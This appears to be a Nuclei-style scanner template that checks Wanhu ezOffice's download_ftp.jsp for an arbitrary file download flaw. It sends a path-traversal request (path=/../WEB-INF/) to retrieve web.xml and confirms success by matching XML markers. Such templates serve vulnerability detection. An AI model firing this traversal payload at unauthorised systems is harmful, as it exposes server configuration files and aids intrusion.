http:
    - matchers:
        - condition: and
          type: word
          words:
            - xml version=
            - display-name
            - param-value
      method: GET
      path:
        - '{{RootURL}}/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml'
id: wanhu-ezoffice-download-ftp-jsp-filedownload
info:
    author: sm
    name: 万户ezoffice download_ftp.jsp 任意文件下载
    severity: high
    tags:
        - wanhu
        - ezoffice
        - filedownlaod
